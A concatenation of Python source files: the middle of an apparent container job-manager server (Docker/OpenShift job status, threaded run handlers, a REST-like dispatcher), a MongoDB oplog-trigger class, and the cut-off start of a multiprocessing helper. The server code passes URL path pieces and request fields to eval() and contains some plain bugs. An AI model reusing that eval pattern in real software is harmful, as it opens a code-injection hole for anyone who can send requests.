Execution should only reach this method for "container"ized jobs
status determination!
The 'd_state' contains a dictionary representation of the container
DB tree.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
o The memory container tree contains a dictionary called 'state'
that is the state returned by the container service, as well as
a file called 'logs' that is the stdout/stderr generated by the
job as it ran in the container.
"""
d_state = None
str_jobRoot = ''
str_hitIndex = "0"
for k,v in kwargs.items():
if k == 'd_state': d_state = v
if k == 'hitIndex': str_hitIndex = v
self.dp.qprint('checking on status using container...')
str_jobRoot = d_state['d_ret']['%s.container' % str_hitIndex]['jobRoot']
self._ptree.cd('/%s/container' % str_jobRoot)
str_serviceName = self._ptree.cat('manager/env/serviceName')
str_managerImage = self._ptree.cat('manager/image')
str_managerApp = self._ptree.cat('manager/app')
# pudb.set_trace()
# Check if the state of the container service has been recorded to the data tree
if self._ptree.exists('state', path = '/%s/container' % str_jobRoot):
# If this exists, then the job has actually completed and
# its state has been recorded in the data tree. We can simply 'cat'
# the state from this memory dictionary
d_serviceState = self._ptree.cat('/%s/container/state')
if self._ptree.exists('logs', path = '/%s/container' % str_jobRoot):
# The job has actually completed and its logs are recorded in the data tree
str_logs = self._ptree.cat('/%s/container/logs')
else:
# Here, the manager has not been queried yet about the state of
# the service. We need to ask the container service for this
# state, and then record the state (and logs) in the memory
# tree, and then "shut down" the service.
client = docker.from_env()
# pudb.set_trace()
# Get the state of the service...
str_cmdManager = '%s --state %s' % \
(str_managerApp, str_serviceName)
byte_str = client.containers.run(
'%s' % str_managerImage,
str_cmdManager,
volumes = {
'/var/run/docker.sock':
{
'bind': '/var/run/docker.sock',
'mode': 'rw'
}
},
remove = True)
d_serviceState = json.loads(byte_str.decode())
# Now, parse for the logs of the actual container run by the service:
# NB: This has only really tested/used on swarm!!
str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
container = client.containers.get(str_contID)
str_logs = container.logs()
str_logs = str_logs.decode()
d_ret = self.t_status_process_container_stateObject(
hitIndex = str_hitIndex,
jobState = d_state,
serviceState = d_serviceState,
logs = str_logs
)
# d_ret {
# 'status': bool,
# d_process: {
# 'currentState': str_currentState,
# 'removeJob': b_removeJob,
# 'status': True
# }
# }
return {
'status': d_ret['status'],
'logs': str_logs,
'currentState': d_ret['d_process']['currentState']
}
def t_status_process_openshift(self, *args, **kwargs):
"""
Determine the status of a job scheduled using the openshift manager.
PRECONDITIONS:
o Only call this method if a container structure exists
in the relevant job tree!
POSTCONDITIONS:
o If the job is completed, then shutdown the container cluster
service.
"""
return False
d_state = None
str_jobRoot = ''
str_hitIndex = "0"
for k,v in kwargs.items():
if k == 'd_state': d_state = v
if k == 'hitIndex': str_hitIndex = v
self.dp.qprint('checking on status using openshift...')
str_jobRoot = d_state['d_ret']['%s.openshift' % str_hitIndex]['jobRoot']
self._ptree.cd('/%s' % str_jobRoot)
jid = self._ptree.cat('jid')
# Check if the state of the openshift service has been recorded to the data tree
if self._ptree.exists('state', path = '/%s/openshift' % str_jobRoot):
# The job has actually completed and its state recorded in the data tree
d_json = self._ptree.cat('/%s/openshift/state')
else:
d_json = self.get_openshift_manager().state(jid)
return self.t_status_process_openshift_stateObject( hitIndex = str_hitIndex,
jobState = d_state,
serviceState = d_json)
def t_status_process_openshift_stateObject(self, *args, **kwargs):
"""
Process the actual JSON container return object on service
state.
PRECONDITIONS:
o This method should only ever be called by t_status_process_openshift().
POSTCONDITIONS:
o A string denoting the current state is returned.
"""
def job_exists(jid):
"""
Returns a bool:
- True: <jid> does exist
- False: <jid> does not exist
"""
b_exists = False
try:
job = self.get_openshift_manager().get_job(jid)
b_exists = True
except:
b_exists = False
return b_exists
def job_shutDown(d_serviceInfo):
"""
Shut down a service
"""
return self.get_openshift_manager().remove(jid)
d_serviceState = None
d_jobState = None
str_hitIndex = "0"
str_ret = 'undefined'
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if d_serviceState:
str_ret, str_jobRoot, b_removeJob = self.t_status_process_state(
d_serviceState,
d_jobState,
str_hitIndex,
'openshift'
)
if b_removeJob:
self._ptree.cd('/%s' % str_jobRoot)
jid = self._ptree.cat('jid')
if job_exists(jid):
job_shutDown(jid)
return str_ret
def get_openshift_manager(self):
if not self.openshiftmgr:
self.openshiftmgr = OpenShiftManager()
return self.openshiftmgr
def t_status_process_state(self, *args, **kwargs):
"""
This method processes the swarm state object to make the
final determination on a job's state and print out container
job state and logs.
It also returns a signal to the caller to trigger the removal
of the job from the swarm scheduler if the job has completed.
Both the "openshift" and "swarm/container" code calls this,
hence the somewhat clumsy passing of a string token. Probably
not the best design...
"""
def debug_print( str_jobRoot,
d_serviceState,
str_currentState,
str_logs
):
"""
Simply print some useful debug info.
"""
l_commsNorm = ['rx', 'rx', 'tx']
l_commsErr = ['error', 'error', 'error']
l_comms = l_commsNorm
if str_currentState == 'finishedWithError':
l_comms = l_commsErr
self.dp.qprint('\njobRoot %s\n-->%s<--...' % \
(str_jobRoot,
str_currentState),
comms = l_comms[0])
self.dp.qprint('\n%s' % self.df_print(d_serviceState),
comms = l_comms[1])
self.dp.qprint('\njob logs:\n%s' % str_logs,
comms = l_comms[2])
d_serviceState = {}
d_jobState = {}
hitIndex = 0
str_logs = ""
str_containerType = ""
for k,v in kwargs.items():
if k == 'jobState': d_jobState = v
if k == 'serviceState': d_serviceState = v
if k == 'hitIndex': str_hitIndex = v
if k == 'logs': str_logs = v
if k == 'containerType': str_containerType = v
# pudb.set_trace()
b_removeJob = False
str_jobRoot = d_jobState['d_ret']['%s.%s' % (hitIndex, str_containerType)]['jobRoot']
str_state = d_serviceState['Status']['State']
str_message = d_serviceState['Status']['Message']
str_contID = d_serviceState['Status']['ContainerStatus']['ContainerID']
if str_state == 'running' and str_message == 'started':
str_currentState = 'started'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
else:
self.DB_store(d_serviceState, '/%s/%s' % (str_jobRoot, str_containerType), 'state')
self.DB_store(str_logs, '/%s/%s' % (str_jobRoot, str_containerType), 'logs')
b_removeJob = True
if str_state == 'failed' and str_message == 'started':
str_currentState = 'finishedWithError'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
elif str_state == 'complete' and str_message == 'finished':
str_currentState = 'finishedSuccessfully'
debug_print(str_jobRoot, d_serviceState, str_currentState, str_logs)
self.DB_store(str_currentState, '/%s/%s' % (str_jobRoot, str_containerType), 'currentState')
return {
'currentState': str_currentState,
'removeJob': b_removeJob,
'status': True
}
def t_hello_process(self, *args, **kwargs):
"""
The 'hello' action is merely to 'speak' with the server. The server
can return current date/time, echo back a string, query the startup
command line args, etc.
This method is a simple means of checking if the server is "up" and
running.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In hello process...")
b_status = False
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'askAbout' in d_meta.keys():
str_askAbout = d_meta['askAbout']
d_ret['name'] = self.within.str_name
d_ret['version'] = self.within.str_version
if str_askAbout == 'timestamp':
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
d_ret['timestamp'] = {}
d_ret['timestamp']['now'] = str_timeStamp
b_status = True
if str_askAbout == 'sysinfo':
d_ret['sysinfo'] = {}
d_ret['sysinfo']['system'] = platform.system()
d_ret['sysinfo']['machine'] = platform.machine()
d_ret['sysinfo']['platform'] = platform.platform()
d_ret['sysinfo']['uname'] = platform.uname()
d_ret['sysinfo']['version'] = platform.version()
d_ret['sysinfo']['memory'] = psutil.virtual_memory()
d_ret['sysinfo']['cpucount'] = multiprocessing.cpu_count()
d_ret['sysinfo']['loadavg'] = os.getloadavg()
d_ret['sysinfo']['cpu_percent'] = psutil.cpu_percent()
d_ret['sysinfo']['hostname'] = socket.gethostname()
d_ret['sysinfo']['inet'] = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
b_status = True
if str_askAbout == 'echoBack':
d_ret['echoBack'] = {}
d_ret['echoBack']['msg'] = d_meta['echoBack']
b_status = True
return { 'd_ret': d_ret,
'status': b_status}
def t_run_process(self, *args, **kwargs):
"""
Main job handler -- this is in turn a thread spawned from the
parent listener thread.
By being threaded, the client http caller gets an immediate
response without needing to wait on the jobs actually running
to completion.
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_Tcontainer = {}
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'treeList': d_Tcontainer = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
if isinstance(self.jid, int):
self.jid = str(self.jid)
self.dp.qprint("spawning and starting poller thread")
# Start the 'poller' worker
self.poller = Poller(cmd = str_cmd,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.poller.start()
str_timeStamp = datetime.datetime.today().strftime('%Y%m%d%H%M%S.%f')
str_uuid = uuid.uuid4()
str_dir = '%s_%s' % (str_timeStamp, str_uuid)
self.str_jobRootDir = str_dir
b_jobsAllDone = False
p = self._ptree
p.cd('/')
p.mkcd(str_dir)
if d_Tcontainer:
# Save the trees in this list to the DB...
for name,tree in d_Tcontainer.items():
p.mkcd(name)
tree.copy(startPath = '/', destination = p, pathDiskRoot = '/%s/%s' % (str_dir, name))
p.cd('/%s' % str_dir)
p.touch('d_meta', json.dumps(d_meta))
p.touch('cmd', str_cmd)
if len(self.auid):
p.touch('auid', self.auid)
if len(self.jid):
p.touch('jid', self.jid)
p.mkdir('start')
p.mkdir('end')
jobCount = 0
p.touch('jobCount', jobCount)
while not b_jobsAllDone:
try:
b_jobsAllDone = self.poller.queueAllDone.get_nowait()
except queue.Empty:
self.dp.qprint('Waiting on start job info')
d_startInfo = self.poller.queueStart.get()
str_startDir = '/%s/start/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_startDir)
p.cd(str_startDir)
p.touch('startInfo', d_startInfo.copy())
p.touch('/%s/startInfo' % str_dir, d_startInfo.copy())
self.dp.qprint('Waiting on end job info')
d_endInfo = self.poller.queueEnd.get()
str_endDir = '/%s/end/%d' % (self.str_jobRootDir, jobCount)
p.mkdir(str_endDir)
p.cd(str_endDir)
p.touch('endInfo', d_endInfo.copy())
p.touch('/%s/endInfo' % str_dir, d_endInfo.copy())
p.touch('/%s/jobCount' % str_dir, jobCount)
jobCount += 1
self.dp.qprint('All jobs processed.')
# Save DB state...
self.within.DB_fileIO(cmd = 'save')
def t_run_process_container(self, *args, **kwargs):
"""
A threaded run method specialized to handling containerized managers and targets.
NOTE: If 'serviceName' is not specified/present, then this defaults to the 'jid'
value and is in fact the default behaviour.
Typical JSON d_request:
{ "action": "run",
"meta": {
"cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
"auid": "rudolphpienaar",
"jid": "simpledsapp-1",
"threaded": true,
"container": {
"target": {
"image": "fnndsc/pl-simpledsapp",
"cmdParse": true
},
"manager": {
"image": "fnndsc/swarm",
"app": "swarm.py",
"env": {
"shareDir": "/home/tmp/share",
"serviceType": "docker",
"serviceName": "testService"
}
}
}
}
}
"""
str_cmd = ""
str_shareDir = ""
str_serviceName = ""
d_request = {}
d_meta = {}
d_container = {}
d_image = {}
d_manager = {}
d_env = {}
self.dp.qprint('Processing swarm-type job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
# pudb.set_trace()
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
str_serviceName = self.jid
if 'container' in d_meta.keys():
d_container = d_meta['container']
d_target = d_container['target']
str_targetImage = d_target['image']
d_manager = d_container['manager']
str_managerImage = d_manager['image']
str_managerApp = d_manager['app']
d_env = d_manager['env']
# pudb.set_trace()
if 'shareDir' in d_env.keys():
str_shareDir = d_env['shareDir']
if 'STOREBASE' in os.environ:
str_storeBase = os.environ['STOREBASE']
(str_origBase, str_key) = os.path.split(str_shareDir)
self.dp.qprint('Overriding shareDir (orig): %s' % str_shareDir)
str_shareDir = os.path.join(str_storeBase, str_key)
self.dp.qprint('Overriding shareDir (new): %s' % str_shareDir)
if 'serviceName' in d_env.keys():
str_serviceName = d_env['serviceName']
else:
d_env['serviceName'] = str_serviceName
# First, attach to the docker daemon...
client = docker.from_env()
#
# If 'container/cmdParse', get a JSON representation of the image and
# parse the cmd for substitutions -- this replaces any of
# $exeshell, $selfpath, and/or $selfexec with the values provided
# in the JSON representation.
#
if d_target['cmdParse']:
byte_str = client.containers.run(str_targetImage)
d_jsonRep = json.loads(byte_str.decode())
for str_meta in ['execshell', 'selfexec', 'selfpath']:
str_cmd = str_cmd.replace("$"+str_meta, d_jsonRep[str_meta])
str_cmdLine = str_cmd
str_cmdManager = '%s -s %s -m %s -i %s -p none -c "%s"' % \
(str_managerApp, str_serviceName, str_shareDir, str_targetImage, str_cmdLine)
try:
byte_str = client.containers.run('%s' % str_managerImage,
str_cmdManager,
volumes = {'/var/run/docker.sock': {'bind': '/var/run/docker.sock', 'mode': 'rw'}},
remove = True)
except Exception as e:
# An exception here most likely occurs due to a serviceName collision.
# Solution is to stop the service and retry.
str_e = '%s' % e
print(str_e)
# Call the "parent" method -- reset the cmdLine to an "echo"
# and create an stree off the 'container' dictionary to store
# in the pman DB entry.
d_meta['cmd'] = 'echo "%s"' % str_cmd
T_container = C_stree()
T_container.initFromDict(d_container)
d_Tcontainer = {'container': T_container}
self.t_run_process(request = d_request,
treeList = d_Tcontainer)
self.dp.qprint('Returning from swarm-type job...')
def t_run_process_openshift(self, *args, **kwargs):
"""
A threaded run method specialized for handling openshift
Typical JSON d_request:
{ "action": "run",
"meta": {
"cmd": "$execshell $selfpath/$selfexec --prefix test- --sleepLength 0 /share/incoming /share/outgoing",
"auid": "rudolphpienaar",
"jid": "simpledsapp-1",
"threaded": true,
"openshift": {
"target": {
"image": "fnndsc/pl-simpledsapp",
"cmdParse": true
}
}
}
}
"""
str_cmd = ""
d_request = {}
d_meta = {}
d_openshift = {}
d_image = {}
self.dp.qprint('Processing openshift job...')
for k,v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if d_meta:
self.jid = d_meta['jid']
self.auid = d_meta['auid']
str_cmd = d_meta['cmd']
if 'openshift' in d_meta.keys():
d_openshift = d_meta['openshift']
d_target = d_openshift['target']
str_targetImage = d_target['image']
#
# If 'openshift/cmdParse', get a JSON representation of the image and
# parse the cmd for substitutions -- this replaces any of
# $exeshell, $selfpath, and/or $selfexec with the values provided
# in the JSON representation.
#
if d_target['cmdParse']:
cmdparse_pod_name = self.jid + '-cmdparse'
self.get_openshift_manager().create_pod(str_targetImage, cmdparse_pod_name)
count = 0
log = None
while count < 10:
try:
pod = self.get_openshift_manager().get_pod_status(cmdparse_pod_name)
if pod.status.container_statuses[0].state.terminated.exit_code == 0:
log = self.get_openshift_manager().get_pod_log(cmdparse_pod_name)
break
except Exception as e:
str_e = '%s' % e
count += 1
time.sleep(1)
d_cmdparse = ast.literal_eval(log)
for str_meta in ['execshell', 'selfexec', 'selfpath']:
str_cmd = str_cmd.replace("$"+str_meta, d_cmdparse[str_meta])
str_cmdLine = str_cmd
self.get_openshift_manager().schedule(str_targetImage, str_cmdLine, self.jid)
# Call the "parent" method -- reset the cmdLine to an "echo"
# and create an stree off the 'openshift' dictionary to store
# in the pman DB entry.
d_meta['cmd'] = 'echo "%s"' % str_cmd
T_openshift = C_stree()
T_openshift.initFromDict(d_openshift)
d_Topenshift = {'openshift': T_openshift}
self.t_run_process(request = d_request,
treeList = d_Topenshift)
self.dp.qprint('Returning from openshift job...')
def json_filePart_get(self, **kwargs):
"""
If the requested path is *within* a json "file" on the
DB, then we need to find the file, and map the relevant
path to components in that file.
"""
def DB_get(self, **kwargs):
"""
Returns part of the DB tree based on path spec in the URL
"""
r = C_stree()
p = self._ptree
pcwd = p.cwd()
str_URLpath = "/api/v1/"
for k,v in kwargs.items():
if k == 'path': str_URLpath = v
str_path = '/' + '/'.join(str_URLpath.split('/')[3:])
self.dp.qprint("path = %s" % str_path)
if str_path == '/':
# If root node, only return list of jobs
l_rootdir = p.lstr_lsnode(str_path)
r.mknode(l_rootdir)
else:
# Here is a hidden behaviour. If the 'root' dir starts
# with an underscore, then replace that component of
# the path with the actual name in list order.
# This is simply a short hand way to access indexed
# offsets.
l_path = str_path.split('/')
jobID = l_path[1]
# Does the jobID start with an underscore?
if jobID[0] == '_':
jobOffset = jobID[1:]
l_rootdir = list(p.lstr_lsnode('/'))
self.dp.qprint('jobOffset = %s' % jobOffset)
self.dp.qprint(l_rootdir)
try:
actualJob = l_rootdir[int(jobOffset)]
except:
return False
l_path[1] = actualJob
str_path = '/'.join(l_path)
r.mkdir(str_path)
r.cd(str_path)
r.cd('../')
# if not r.graft(p, str_path):
# pudb.set_trace()
if not p.copy(startPath = str_path, destination = r)['status']:
# We are probably trying to access a file...
# First, remove the erroneous path in the return DB
r.rm(str_path)
# Now, we need to find the "file", parse the json layer
# and save...
n = 0
contents = p.cat(str_path)
str_pathFile = str_path
l_path = str_path.split('/')
totalPathLen = len(l_path)
l_pathFile = []
while not contents and -1*n < totalPathLen:
n -= 1
str_pathFile = '/'.join(str_path.split('/')[0:n])
contents = p.cat(str_pathFile)
l_pathFile.append(l_path[n])
if contents and n<0:
l_pathFile = l_pathFile[::-1]
str_access = ""
for l in l_pathFile:
str_access += "['%s']" % l
self.dp.qprint('str_access = %s' % str_access)
try:
contents = eval('contents%s' % str_access)
except:
contents = False
r.touch(str_path, contents)
p.cd(pcwd)
self.dp.qprint(r)
# self.dp.qprint(dict(r.snode_root))
self.dp.qprint(self.pp.pformat(dict(r.snode_root)).strip())
return dict(r.snode_root)
# return r
def process(self, request, **kwargs):
""" Process the message from remote client
In some philosophical respects, this process() method in fact implements
REST-like API of its own.
"""
if len(request):
REST_header = ""
REST_verb = ""
str_path = ""
json_payload = ""
self.dp.qprint("Listener ID - %s: process() - handling request" % (self.worker_id))
now = datetime.datetime.today()
str_timeStamp = now.strftime('%Y-%m-%d %H:%M:%S.%f')
self.dp.qprint(Colors.YELLOW)
self.dp.qprint("***********************************************")
self.dp.qprint("***********************************************")
self.dp.qprint("%s incoming data stream" % (str_timeStamp) )
self.dp.qprint("***********************************************")
self.dp.qprint("len = %d" % len(request))
self.dp.qprint("***********************************************")
self.dp.qprint(Colors.CYAN + "%s\n" % (request.decode()) + Colors.YELLOW)
self.dp.qprint("***********************************************" + Colors.NO_COLOUR)
l_raw = request.decode().split('\n')
FORMtype = l_raw[0].split('/')[0]
self.dp.qprint('Request = ...')
self.dp.qprint(l_raw)
REST_header = l_raw[0]
REST_verb = REST_header.split()[0]
str_path = REST_header.split()[1]
json_payload = l_raw[-1]
# remove trailing '/' if any on path
if str_path[-1] == '/': str_path = str_path[0:-1]
d_ret = {'status': False,
'RESTheader': REST_header,
'RESTverb': REST_verb,
'action': "",
'path': str_path,
'receivedByServer': l_raw}
if REST_verb == 'GET':
d_ret['GET'] = self.DB_get(path = str_path)
d_ret['status'] = True
self.dp.qprint('json_payload = %s' % self.pp.pformat(json_payload).strip())
d_ret['client_json_payload'] = json_payload
d_ret['client_json_len'] = len(json_payload)
if len(json_payload):
d_payload = json.loads(json_payload)
d_request = d_payload['payload']
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['payloadsize']= len(json_payload)
if payload_verb == 'quit':
self.dp.qprint('Shutting down server...')
d_ret['status'] = True
if payload_verb == 'run' and REST_verb == 'PUT':
d_ret['action'] = payload_verb
self.processPUT( request = d_request)
d_ret['status'] = True
if REST_verb == 'POST':
self.processPOST( request = d_request,
ret = d_ret)
return d_ret
else:
return False
def methodName_parse(self, **kwargs):
"""
Construct the processing method name (string) by parsing the
d_meta dictionary.
"""
d_meta = {}
d_container = {}
str_method = "" # The main 'parent' method
str_methodSuffix = "" # A possible 'subclass' specialization
for k,v in kwargs.items():
if k == 'request': d_request= v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
for container_name in CONTAINER_NAMES:
if container_name in d_meta.keys():
# If the `container_name` json paragraph exists, then route processing to
# a suffixed '_<container_name>' method.
str_methodSuffix = '_%s' % container_name
break
str_method = 't_%s_process%s' % (payload_verb, str_methodSuffix)
return str_method
def processPOST(self, **kwargs):
"""
Dispatcher for POST
"""
for k,v in kwargs.items():
if k == 'request': d_request = v
if k == 'ret': d_ret = v
payload_verb = d_request['action']
if 'meta' in d_request.keys():
d_meta = d_request['meta']
d_ret['action'] = payload_verb
d_ret['meta'] = d_meta
b_threaded = False
if 'threaded' in d_meta.keys():
b_threaded = d_meta['threaded']
if b_threaded:
self.dp.qprint("Will process request in new thread.")
pf_method = None
# pudb.set_trace()
str_method = self.methodName_parse(request = d_request)
# str_method = 't_%s_process' % payload_verb
try:
pf_method = getattr(self, str_method)
except AttributeError:
raise NotImplementedError("Class `{}` does not implement `{}`".format(pman.__class__.__name__, str_method))
t_process = threading.Thread( target = pf_method,
args = (),
kwargs = kwargs)
t_process.start()
time.sleep(0.1)
if payload_verb == 'run':
d_ret['jobRootDir'] = self.str_jobRootDir
d_ret['status'] = True
else:
self.dp.qprint("Will process request in current thread.")
d_done = eval("self.t_%s_process(request = d_request)" % payload_verb)
try:
d_ret['d_ret'] = d_done["d_ret"]
d_ret['status'] = d_done["status"]
except:
self.dp.qprint("An error occurred in reading ret structure. Should this method have been threaded?")
return d_ret
def processPUT(self, **kwargs):
"""
Dispatcher for PUT
"""
d_request = {}
str_action = "run"
str_cmd = "save"
str_DBpath = self.str_DBpath
str_fileio = "json"
tree_DB = self._ptree
for k,v in kwargs.items():
if k == 'request': d_request = v
str_action = d_request['action']
self.dp.qprint('action = %s' % str_action)
d_meta = d_request['meta']
self.dp.qprint('action = %s' % str_action)
# Optional search criteria
if 'key' in d_meta:
d_search = self.t_search_process(request = d_request)['d_ret']
p = self._ptree
Tj = C_stree()
Tdb = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathJob = '/api/v1/' + job
d_job = self.DB_get(path = str_pathJob)
Tj.initFromDict(d_job)
Tj.copy(startPath = '/', destination = Tdb)
# Tdb.graft(Tj, '/')
# self.DB_get(path = str_pathJob).copy(startPath = '/', destination = Tdb)
# print(Tdb)
tree_DB = Tdb
if 'context' in d_meta: str_context = d_meta['context']
if 'operation' in d_meta: str_cmd = d_meta['operation']
if 'dbpath' in d_meta: str_DBpath = d_meta['dbpath']
if 'fileio' in d_meta: str_type = d_meta['fileio']
if str_action.lower() == 'run' and str_context.lower() == 'db':
self.within.DB_fileIO( cmd = str_cmd,
fileio = str_fileio,
dbpath = str_DBpath,
db = tree_DB)
class Poller(threading.Thread):
"""
The Poller checks for running processes based on the internal
DB and system process table. Jobs that are no longer running are
removed from the internal DB.
"""
def __init__(self, **kwargs):
self.pollTime = 10
self.str_cmd = ""
self.crunner = None
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
# self.dp.qprint('starting...', level=-1)
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
for key,val in kwargs.items():
if key == 'pollTime': self.pollTime = val
if key == 'cmd': self.str_cmd = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
self.dp = debug(verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
threading.Thread.__init__(self)
def run(self):
timeout = 1
loop = 10
""" Main execution. """
# Spawn the crunner object container
self.crunner = Crunner(cmd = self.str_cmd,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.crunner.start()
b_jobsAllDone = False
while not b_jobsAllDone:
try:
b_jobsAllDone = self.crunner.queueAllDone.get_nowait()
except queue.Empty:
# We basically propagate the queue contents "up" the chain.
self.dp.qprint('Waiting on start job info')
self.queueStart.put(self.crunner.queueStart.get())
self.dp.qprint('Waiting on end job info')
self.queueEnd.put(self.crunner.queueEnd.get())
self.queueAllDone.put(b_jobsAllDone)
self.dp.qprint("done with Poller.run")
class Crunner(threading.Thread):
"""
The wrapper thread about the actual process.
"""
def __init__(self, **kwargs):
self.__name = "Crunner"
self.queueStart = queue.Queue()
self.queueEnd = queue.Queue()
self.queueAllDone = queue.Queue()
self.str_cmd = ""
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
for k,v in kwargs.items():
if k == 'cmd': self.str_cmd = v
if k == 'debugFile': self.str_debugFile = v
if k == 'debugToFile': self.b_debugToFile = v
self.shell = crunner( verbosity = 0,
level = -1,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile)
self.dp = debug( verbosity = 0,
level = -1,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile)
self.dp.qprint('starting crunner...')
threading.Thread.__init__(self)
def jsonJobInfo_queuePut(self, **kwargs):
"""
Get and return the job dictionary as a json string.
"""
str_queue = 'startQueue'
for k,v in kwargs.items():
if k == 'queue': str_queue = v
if str_queue == 'startQueue': queue = self.queueStart
if str_queue == 'endQueue': queue = self.queueEnd
# self.dp.qprint(self.shell.d_job)
queue.put(self.shell.d_job.copy())
def run(self):
timeout = 1
loop = 10
""" Main execution. """
self.dp.qprint("running...")
self.shell(self.str_cmd)
# self.shell.jobs_loopctl( onJobStart = 'self.jsonJobInfo_queuePut(queue="startQueue")',
# onJobDone = 'self.jsonJobInfo_queuePut(queue="endQueue")')
self.shell.jobs_loopctl( onJobStart = partial(self.jsonJobInfo_queuePut, queue="startQueue"),
onJobDone = partial(self.jsonJobInfo_queuePut, queue="endQueue"))
self.queueAllDone.put(True)
self.queueStart.put({'allJobsStarted': True})
self.queueEnd.put({'allJobsDone': True})
# self.shell.exitOnDone()
self.dp.qprint('Crunner.run() returning...')
|
mongotriggers.py
|
from .mongodtriggers import MongodTrigger
import threading
"""Class for manipulating notifications from MongoDB """
class MongoTrigger(object):
def __init__(self, conn, since=None):
"""Creates MongoTriggers instance
The object uses a defered context to provide notification on a
different context to avoid exploiting the caller thread/process
Args:
conn (MongoClient) - connection on which triggers will be fired
since (datetime) - the last timestamp to start listening from
"""
self.trigger = MongodTrigger(conn, since)
self.thread = None
def tail_oplog(self):
"""Listens to oplog and fire the registered callbacks """
if self.thread:
raise OSError("unable to tail using more than 1 thread")
self.thread = threading.Thread(target=self.trigger.start_tailing)
self.thread.start()
def stop_tail(self):
"""Stops listening to the oplog, no callbacks after calling this """
self.trigger.stop_tailing()
self.thread.join()
self.thread = None
def register_op_trigger(self, func, db_name=None, collection_name=None):
"""Watches the specified database and collections for any changes
Args:
func (callback): function to be invoked when any operation occurs
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_insert_trigger(func, db_name, collection_name)
self.trigger.register_update_trigger(func, db_name, collection_name)
self.trigger.register_delete_trigger(func, db_name, collection_name)
def register_insert_trigger(self, func, db_name=None, collection_name=None):
"""Adds an insert callback to the specified namespace
Args:
func (callback): callback to execute when an insert operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_insert_trigger(func, db_name, collection_name)
def register_update_trigger(self, func, db_name=None, collection_name=None):
"""Adds ann update callback to the specified namespace
Args:
func (callback): callback to execute when an update operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_update_trigger(func, db_name, collection_name)
def register_delete_trigger(self, func, db_name=None, collection_name=None):
"""Adds a delete callback to the specified namespace
Args:
func (callback): callback to execute when a delete operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.register_delete_trigger(func, db_name, collection_name)
def unregister_op_trigger(self, func, db_name=None, collection_name=None):
"""Removes all callbacks from the specified namespace
Args:
func (callback): callback to disable when any operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_insert_trigger(func, db_name, collection_name)
self.trigger.unregister_update_trigger(func, db_name, collection_name)
self.trigger.unregister_delete_trigger(func, db_name, collection_name)
def unregister_insert_trigger(self, func, db_name=None, collection_name=None):
"""Removes an insert callback from the specified namespace
Args:
func (callback): callback to disable when an insert operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_insert_trigger(func, db_name, collection_name)
def unregister_update_trigger(self, func, db_name=None, collection_name=None):
"""Removes an update callback from the specified namespace
Args:
func (callback): callback to disable when an insert operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_update_trigger(func, db_name, collection_name)
def unregister_delete_trigger(self, func, db_name=None, collection_name=None):
"""Removes a delete callback from the specified namespace
Args:
func (callback): callback to disable when an insert operation occur
db_name (str): name of Mongo database to watch for changes
collection_name (str): name of Mongo collection to watch for changes
"""
self.trigger.unregister_delete_trigger(func, db_name, collection_name)
|
process.py
|
"""diesel's async I/O event hub meets multiprocessing.
Let's you run CPU intensive work in subprocesses and not block the event hub
while doing so.
"""
import multiprocessing as mp
import traceback
from diesel import runtime
from diesel import core
from diesel.util.queue import Queue
def spawn(func):
"""Spawn a new process that will run func.
The returned Process instance can be called just like func.
The spawned OS process lives until it is term()ed or otherwise dies. Each
call to the returned Process instance results in another iteration of
the remote loop. This way a single process can handle multiple calls to
func.
"""
return Process(func)
def term(proc):
